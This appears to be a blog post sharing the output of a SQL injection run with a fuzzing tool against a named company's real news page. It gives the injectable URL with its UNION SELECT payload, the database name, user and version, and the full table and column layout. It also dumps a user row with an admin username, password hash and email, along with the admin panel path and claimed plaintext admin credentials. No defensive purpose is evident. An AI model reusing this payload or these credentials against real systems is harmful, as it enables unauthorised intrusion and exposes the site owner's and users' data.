Tools : schemafuzz.py v.50 mod by me
Admin panel: /login.php
Admin user/pwd: mommy:mommy
P.S: this vuln already been found, and it's on google
[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:53:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Showing Tables & Columns from database "axiscoid_db"
[+] Number of Tables: 18
[Database]: axiscoid_db
[Table: Columns]
[0]tb_case: id,product,name,date,description,addtext
[1]tb_complain: id,userid,date,subject,complain
[2]tb_contact: Id,owner,name,email,mobile,ket
[3]tb_file: Id,name,type,folder,shared,created,update,owner,size
[4]tb_link: id,name,address,ket
[5]tb_mcontent: id,category,name,date,description,addtext
[6]tb_news: code,catagory,header,writer,date,news,pic,status,inc
[7]tb_news_status: code,name
[8]tb_news_topic: code,name
[9]tb_partner: id,name,email,address,phone,website,company
[10]tb_product: id,name,date,descreption,pic_front,logo,status,addtext
[11]tb_product_cat: code,name
[12]tb_product_status: code,name
[13]tb_promotion: id,word,date,picture,status,category,link
[14]tb_promotion_cat: id,name
[15]tb_search: id,keyword,address,desc,date
[16]tb_user: id,userid,password,nama,email,alamat,phone,mobile,tmp_lahir,tgl_lahir,status
[17]tb_user_cat: code,name
[-] [11:54:56]
[-] Total URL Requests 97
[-] Done
[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:56:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Dumping data from database "axiscoid_db" Table "tb_user"
[+] Column(s) ['userid', 'password', 'email']
[+] Number of Rows: 1
[0] mommy:2623e0d1f4e1a3093ee71672ec1c771a:mommy@axis.co.id:mommy@axis.co.id:
[-] [11:56:16]
[-] Total URL Requests 3
[-] Done
0 comments:
Post a Comment